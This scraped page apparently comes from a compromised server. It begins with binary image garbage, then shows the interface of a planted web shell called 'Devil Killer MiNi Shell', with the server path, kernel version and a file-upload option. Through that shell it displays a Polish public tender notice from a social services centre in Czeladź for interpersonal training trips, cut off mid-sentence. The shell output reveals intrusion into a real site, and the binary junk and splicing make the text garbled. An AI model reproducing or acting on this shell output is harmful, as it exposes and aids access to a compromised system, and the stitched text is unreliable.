JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20250804/

Linux 9dbcd5f6333d 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20250804/0036039901-N-2025.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Zorganizowanie i przeprowadzenie wyjazdowych treningów interpersonalnych </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Centrum Usług Społecznych w Czeladzi</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 003450413</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">17 Lipca 27</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Czeladź</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">41-250</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">śląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL22B - Sosnowiecki</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">032/2651442</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">032/2656811</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">cus@cus.czeladz.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.cus.czeladz.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka budżetowa</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Zorganizowanie i przeprowadzenie wyjazdowych treningów interpersonalnych </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-9a09ed98-9764-4da8-87bf-63c1b734cf70</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2025/BZP 00360399</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2025-08-04</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2025/BZP 00039322/05/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.8 Trening interpersonalny - wyjazdowy dla 200 uczestników projektu</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.13.) O zamówienie mogą ubiegać się wyłącznie wykonawcy, którzy spełniają warunki określone w art. 361 ustawy – usługi społeczne: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.15.) Nazwa projektu lub programu</h3> <p class="mb-0"> &#34;Od Czeladzkiej transformacji do międzypokoleniowej reaktywacji&#34; w ramach Programu Fundusze Europejskie dla Śląskiego 2021-2027, współfinansowanego ze środków Funduszu na rzecz Sprawiedliwej Transformacji dla Priorytetu: FESL.10.00. Fundusze Europejskie na transformację, dla Działania: FESL.10.24. Włączenie społeczne – wzmocnienie procesu sprawiedliwej transformacji. </p> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://mops-czeladz.logintrade.net/rejestracja/ustawowe.html <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://mops-czeladz.logintrade.net/rejestracja/ustawowe.html</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">https://mops-czeladz.logintrade.net/rejestracja/instrukcje.html</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art.13ust.1i2rozporządzenia PEiRady(UE)2016/679z27kwietnia2016w sprawie ochrony os. fizycznych w zwi.z przetwarzaniem danych os.i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy95/46/WE (ogólne rozporządzenie o ochronie danych)(Dz.Urz.UE L119z4.5.2016r.str.1),dalej „RODO”,informuję, że: 1.Administratorem Pani/Pana danych os. jest CUSwCzeladzi z siedzibą przy ul.17Lipca27,41 450Czeladź,mail:cus@cus.czeladz.pl,tel+48322651442.2.W CUSwCz-dzi wyznaczono IODO,z którym może się Pani/Pan skontaktować:drogą elektr. poprzez mail:iod@cus.czeladz.pl,telefonicznie pod nr+48322651442.Z IODOmożna się kontaktować we wszystkich sprawach dot. przetwarzania danych os. oraz korzystania z praw związanych z przetwarzaniem danych.3.Pani/Pana dane os. przetwarzane będą w celu przeprowadzenia postęp. i udzielenia zamówienia, prowadzenia dokumentacji księgowo-podatkowej,archiwizacji danych,dochodzenia roszczeń lub obrony przed roszczeniami.4. Podstawą przetwarzania danych os. jest:ustawa z11.09.2019 r. – PZP;ustawa z27.08.2009o finansach publicznych;ustawa z14.07.1983o narodowym zasobie archiwalnym i archiwach;art.6lit.1 lit.cRODO – przetwarzanie jest niezbędne do wypełnienia obowiązku prawnego ciążącego na administratorze.5.Odbiorca lub kategorie odbiorców:Podmioty upoważnione na podst.zawartych umów powierzenia oraz uprawnione na mocy obowiązujących przepisów prawa, w szczególności os.lub podmioty, którym zostanie udostęp.dok.postępowania na podstawie art.18oraz art.74-76PZP.Zasada jawności ma zastosowanie do wszystkich danych osobowych z wyjątkiem danych,o których mowa w art.9ust.1RODO (szczególna kategoria danych).6.Zebrane dane będą przechowywane przez okres nie dłuższy, niż jest to niezbędne do celów,w których dane te są przetwarzane oraz do celów archiwizacyjnych,na podstawie art.22dust.2Ustawy z dnia14lipca1983o narodowym zasobie archiwalnym i archiwach, zgodnie z JRWA,stanowiącym załącznik do Zarządzenia14/2025DyrektoraCUSwCzeladzi z dnia2 stycznia2025-zgodnie z art.78ust.1i4PZPprzez okres4lat od dnia zakończenia postępowania o udzielenie zam,a jeżeli okres obowiązywania umowy w sprawie zamówienia publicznego przekracza 4lata–przez cały okres obowiązywania umowy.7.Posiada Pani/Pan prawo:a)żądania dostępu do danych;w przypadku gdy wykonanie tego obowiązku,wymagałoby niewspółmiernie dużego wysiłku,zam.może zgodnie z art.75PZPżądać od osoby,której dane dotyczą,wskazania dodatkowych informacji mających na celu sprecyzowanie nazwy lub daty zakończonego postęp. udzielenie zam.b)żądania sprostowania lub uzupełnienia danych osobowych;zgodnie z art.76PZPwykonanie tego obowiązku nie może naruszać integralności protokołu postęp.oraz jego załączników;c)usunięcia danych,w przypadku gdy dane osobowe nie są już niezbędne do celów,w których zostały zebrane lub w inny sposób przetwarzane;	d)żądania ograniczenia przetwarzania danych osobowych; zgodnie z art.74ust.3 PZP wykonanie tego obowiązku nie ogranicza przetwarzania danych osobowych do czasu zakończenie postępowania o udzielenie zamówienia.8.Przysługuje Pani/Pan prawo do wniesienia skargi do organu nadzorczego, tj.UODOul.Stawki 2,00-913Warszawa.9.Pani/Pana dane osobowe nie będą poddawane zautomatyzowanemu podejmowaniu decyzji,w tym również profilowaniu.10.Pani/Pana dane osobowe nie będą przekazywane odbiorcom w państwach znajdujących się poza UEiEOGlub do organizacji międzynarodowej.11.Podanie danych osobowych jest wymogiem ustawowym określonym w przepisach PZP,związanych z udziałem w postępowaniu o udzielenie zamówienia.Konsekwencje niepodania określonych danych wynikają z PZP.12.Jednocześnie Zamawiający przypomina o ciążącym na Pani/Panu obowiązku informacyjnym wynikającym z art.14RODOwzględem osób fizycznych, których dane przekazane zostaną Zamawiającemu w związku z prowadzonym postępowaniem i które Zamawiający pośrednio pozyska od Wykonawcy biorącego udział w postępowaniu, chyba że ma zastosowanie co najmniej jedno z wyłączeń, o których mowa w art.14ust.5RODO.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZP.10.U.CUS.25</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.5.) Wartość zamówienia: <span class="normal"> 389990,00 PLN </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">4</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Miejsce realizacji: Subregion Południowy Województwa Śląskiego (powiat bielski, żywiecki, cieszyński oraz miasto Bielsko-Biała).<br/>Adresaci zadania: uczestnicy/czki projektu pt.: &#34;Od Czeladzkiej transformacji do międzypokoleniowej reaktywacji&#34;, dorośli i osoby powyżej 15 r.ż.,<br/>Uczestnicy/czki treningu interpersonalnego stanowią osoby mieszkające lub pracujące lub uczące się na terenie Czeladzi: kobiety i mężczyźni, w tym możliwy udział osób z niepełnosprawnością. <br/>Liczba uczestników/czek: 50 osób (+/- 10%) na każdy wyjazd,<br/>1. Każdy wyjazdowy trening interpersonalny obejmuje w szczególności:<br/>1.1. Trening interpersonalny powinien być prowadzony dla około 50 osób podzielonych na dwie – średnio 25-osobowe grupy, w odrębnych salach. Zajęcia powinny być prowadzone równocześnie w dwóch grupach. <br/>Przewiduje się przeprowadzenie treningu interpersonalnego łącznie: max. do 12 godzin zegarowych w trakcie 2 dni (w tym 7 godz. w sobotę, 5 godz. w niedzielę) w następujący sposób:<br/>1.2. Drugi dzień, tj. sobota – w godzinach od 9.00 do 16.00 (łącznie z przerwą kawową i obiadową)<br/>1.3. Trzeci dzień, tj. niedziela – w godzinach od 9.00 do 14:00 (łącznie z przerwą kawową i obiadową)<br/>1.4.Tematyka treningu interpersonalnego (minimalny zakres):<br/>- rozwój kompetencji miękkich,- budowanie zespołu, w tym umiejętności z zakresu podnoszenia wiedzy i świadomości na temat zarządzania różnorodnością, wsparcia kompetencji managerskich,- rozpoznawanie i wyrażanie emocji, - pogłębianie relacji międzyludzkich,- poprawa komunikacji.<br/>Zamawiający wymaga, aby trening interpersonalny miał formę zajęć warsztatowych (min. 75% łącznego czasu przewidzianego na realizację treningu) i uwzględniał różnorodne techniki/narzędzia prowadzenia zajęć (np. ćwiczenia, gry, odgrywanie scenek, itp.). Zamawiający zwraca uwagę, że w treningu interpersonalnym mogą brać udział osoby z niepełnosprawnością, w związku z czym wykonawca zapewnia dostępność dla ww. osób, zgodnie z wymogami standardu szkoleniowego, określonego w załączniku nr 2 do Wytycznych dotyczących realizacji zasad równościowych w ramach funduszy unijnych na lata 2021-2027.<br/>2. Wykonawca w ramach realizacji przedmiotu zamówienia zobowiązany jest do zapewnienia:<br/>2.1. Wyżywienie<br/>2.2. Zakwaterowania<br/>2.3. Przewozu uczestników projektu<br/>2.4. Pokrycia wszystkich wymaganych opłat parkingowych i drogowych.<br/>2.5. Ubezpieczenia grupy w pełnym zakresie - dla 50 osób (+/- 10%) <br/>2.6. Opracowania harmonogramu i programu treningu interpersonalnego z zakresu rozwijania umiejętności interpersonalnych Zamawiającemu w terminie 7 dni od dnia podpisania umowy. <br/>2.7. Udokumentowania fotograficznego (min. 10 zdjęć dobrej jakości)<br/>2.8 Organizacja jednego wieczorku integracyjnego<br/>2.9. Dysponowania odpowiednim potencjałem osobowym tj.:<br/>• 1 osobą, która będzie odpowiedzialna za prawidłową realizację programu zgodnego z harmonogramem treningu interpersonalnego, w tym: prowadzenia dokumentacji, kontakt z Zamawiającym, organizacji czasu wolnego podczas trwania szkolenia wyjazdowego, zapewnienia sprawnego zakwaterowania i wykwaterowania uczestników/czek wraz ze wsparciem w przypadku ewentualnych problemów/reklamacji związanych z użytkowaną infrastrukturą hotelową. <br/>• 2 wykwalifikowanymi trenerami<br/>2.10. Prowadzenia następującej dokumentacji:<br/>a) list obecności na zajęciach zawierających tytuł treningu interpersonalnego, datę, imię i nazwisko, podpis uczestnika,<br/>b) list potwierdzających zakwaterowanie oraz odbioru wydawanych posiłków wraz z poczęstunkiem kawowym zawierających<br/>2.11. Przestrzegania zasad równości szans kobiet i mężczyzn.<br/>2.12. Przekazania całości wymaganej dokumentacji w terminie 5 dni roboczych od dnia zakończenia realizacji treningu interpersonalnego zgodnie z warunkami określonymi w umowie.<br/>2.13. Na każdym etapie realizacji zadania, Zamawiający zastrzega sobie prawo do kontroli, dokumentów, związanych z realizowanym projektem<br/>Z uwagi na na ograniczoną liczbę znaków, pełen zakres informacji znajduje się w załączniku nr 6 do SWZ tj. opis przedmiotu. </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 97497,50 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">80500000-9 - Usługi szkoleniowe</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">80570000-0 - Usługi szkolenia w dziedzinie rozwoju osobistego</p> <p class="mb-0">55110000-4 - Hotelarskie usługi noclegowe</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2025-10-10 do 2025-10-12</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1.Przywyborzeof.zam.kierowałsiębędzinast.kryteriami,zuwzgl.Odpow.współczynnikówag(znacz.wyraż.w%)dla tych kr.oraz maks.il.pkt,jaką może otrzy.of.za dane kryt.:<br/>Dla wszyst.cz.zam.kr.oceny of.są: <br/>1Cena–waga proc-max60%(C)2zatrud.os.niepełn.–wag.proc-max40(Pd)Of.zos.ocen.zapom.Sys.pkt,zg.zponiż.kryt:Kryt.I-Cenaofbrutto(C)–max60%a)Zam.przyz.max.licz.60pkt.of.wyk.znajniż.cenąbruttozawyk.przed.zam.zg.zformul.of.stan.Załnr1a,b,c,d doSWZb)Il.pkt.przyz.pozost.of.wyk.zost.oblicz.zg.z nast.wz.i zaokr.do dw.m.po przec.naj.c.wys.w of.<br/>C=----------------x60<br/>cena badana<br/>U1:Zg.zart.225ust.2u.pzp,jeżelizł.of.kt.wyb.prow.dopowst.uzam.obo.podat.zg.zprzepis.opod.odtow.i usł.Zam.wceluoc.tak.of.doliczadoprzedst.wniejcenypod.odtow.iusł.,kt.miał.obow.Rozli.zg.ztymiprzepis.Wyk.skład.of.inf.zam.czy wyb.of.będzie prowa.do powst.u zam.obow.podat.,wsk. Naz.(rodzaj)tow.lub usł.któ.dost.lub świad.będzieprow.dojegopowst.orazwsk.ichwart.bezkw.podat.istaw.podat.odtow.iusł.którazg.zwie.wyk.b.mia.zastos.W pow.przyp.wyk.podaje w form.of.tylko wart.netto w odnies.do wsk.zakr.przed.zam.zam.w m.przez.nawsk.cenybruttood.stos.Infor.opow.obow.podat.Kryt.IIZatrud.conaj.1(jednej)os.niepełn.dorealiz.zam-max40%(Pd)Zam.wram.tegokryt.przyznaWyk.pkt.napods.oświad.zaw.wFor.of.Wyk.ot.40pktza zatrud.do realiz.zam.now.os. z niepełnospr.nie będących ob.prac.wyk/podwyk lub oddeleg.do realiz.zam.os.z niepełnospraw.zatr.ob.uwyk/podwykOs.zniepełnospraw.toos.speł.war.uzysk.stat.niepełnospr.okr.wu.z dnia27.08.1997o rehab. Zaw.i społ.o.zatrud.os.niepełnospr.lub we właś.przepis.państw członk.UelubEOGlub państw,zkt.UEzawarłaum.rów.trakt.przedsięb.w dost.do zp,na czas realizacji przed.zam.W przyp.gdyWyk.w formul.of.nieuzupełnipolaot.zatrud/oddelegoreal.zam.os.niepełnos.wów.Zam.przyznaWyk0pkt.a)Pop.zatr.nal.roz:zatr.napodst.um.opracęlubwop.o um. c-p. Tym samym os.mogą być zatrud.na podst:um.ag.,um.zl.,um.o dzieło.Zam.wym.zatr./oddeleg.1os.b)Wym.wzakr.zatrud./oddeleg.odn.siędozaangaż.os.niepeł.dorealiz.przed. Zam.poprzez pow.tej os.czynn.zw.z fakt.realiz.zam.c)Wyk.zł.oś.,najpóź.do dn.rozp.reali.um,dot zakr.i rodz. zad.,kt.będzie wyk.os.niepełnos.w ram.reali.um.d)Zam.upr.b.do kont.speł.przez Wyk.wym.dot.zatr.os. Niepełn.U2:Przy ob.pkt.zam.zas.zaokr.do dw.m.po przec.wd.zas.że trzecia cyf.po przec.od5w górę pow. zaokr.dr.cyf.po przec.w górę o1.Jeśli trz.cyf.po przec.j.mn.niż5,to dr.cyf.po przec.nie ul.zm.Zam.dok.wyb. of.t.z wyk.,kt.of.uz.w wyn.oc.najwyż.licz.pkt. Przyzn. pkt poszcz.of.odb.się w opar.o wz:L = C + Pd gdzie:L-licz.pkt uzys.przez of.C–licz.pkt uzysk.w kryt.&#34;Cena&#34;.Pd–licz.pkt uzysk.w kryt.„Zatrud.lub oddeleg.os. Niepełnos.dorealiz.zammax40pkt”2.Oc.b.podl.wył.of.niepodleg.odrzuc.3.Zanajkorzys.zos.uz.of.kt.otrz.najw.il.pktłącz.zewszys.kryt.4.Wsyt.,gdyzam.nieb.mógłok.wyb.Najkorzys.of.zewz.nato,żezost.zł.of.otak.sam.il.pkt,wez.onwyk.,kt.zło.tef.dozł.w term.okr.przez zam.of.dodat.zaw.n.cenę. Wyk.skł.of.dod.,nie m.zaofer.cen wyż.niż zaof.w up.złoż.przeznichof.5. W toku bad.of.i oc.of.zam.może ż. od wyk. Wyjaś.dot. treści złoż. przez nich of.oraz/lubinn.SkłDok.luboś.Wyk.sązob.doprzeds.wyjaś.wterm.wsk.p.zam.6.Zam.wyb.najkorzys.of.w term.zw.of.okreś.naplat.zakup.zpostęp.7.Jeżeliter.zw.of.upł.przedwyb.najkorzys.of.,zam.wez.wyk.,któr.of.otrz.najwyż.oc.do wyraż.w wyznacz.przezzam.term.pisem.zg.nawyb.jegoof.8.Wprzyp.br.zg.okt.mo.wpkt7of.podle.odrzuc.,azam.zwr.się wyraż.tak. zg.do kolej.wyk.,kt.of.zos.najwyż.oc.,chybaże,zach.przes.do unieważ.postęp.9.Zam. Unieważ.postęp.o udziel.zam. jeżeli:1)nie złoż.żad.wn. o dopusz.do udzi.w postęp. albo żadnej of2)wszys.zł.wn.o dop.do udz.w postęp.al.of.podl.odrzuc3)cena lub koszt najkorzys.of.lub of.z najni.c.przewyż.kw.kt.zam.zam.przez.na sfinan.zam.,chybażezam.m.zwię.tękw.doc.lubkosz.najkorzys.of4)wprzyp,okt.m.w art.248ust.3,art.249iart.250ust.2,zos.zł.of.dod.o tak.sam.c.lub kosz5)wyst.istot.z.oko.pow.,żepro.pos.lub wyk.zam.nieleżywinter.pub.,cze.niem.byłowcześ.przew6)post.Obar.jestniemoż.dousun.wadąuniemoż.zaw.niepod.uniew.umo.w spr.zam.pub.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Zatrudnienie co najmniej 1 (jednej) osoby niepełnosprawnej do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Miejsce realizacji: Subregion Południowy Województwa Śląskiego (powiat bielski, żywiecki, cieszyński oraz miasto Bielsko-Biała).<br/>Adresaci zadania: uczestnicy/czki projektu pt.: &#34;Od Czeladzkiej transformacji do międzypokoleniowej reaktywacji&#34;, dorośli i osoby powyżej 15 r.ż.,<br/>Uczestnicy/czki treningu interpersonalnego stanowią osoby mieszkające lub pracujące lub uczące się na terenie Czeladzi: kobiety i mężczyźni, w tym możliwy udział osób z 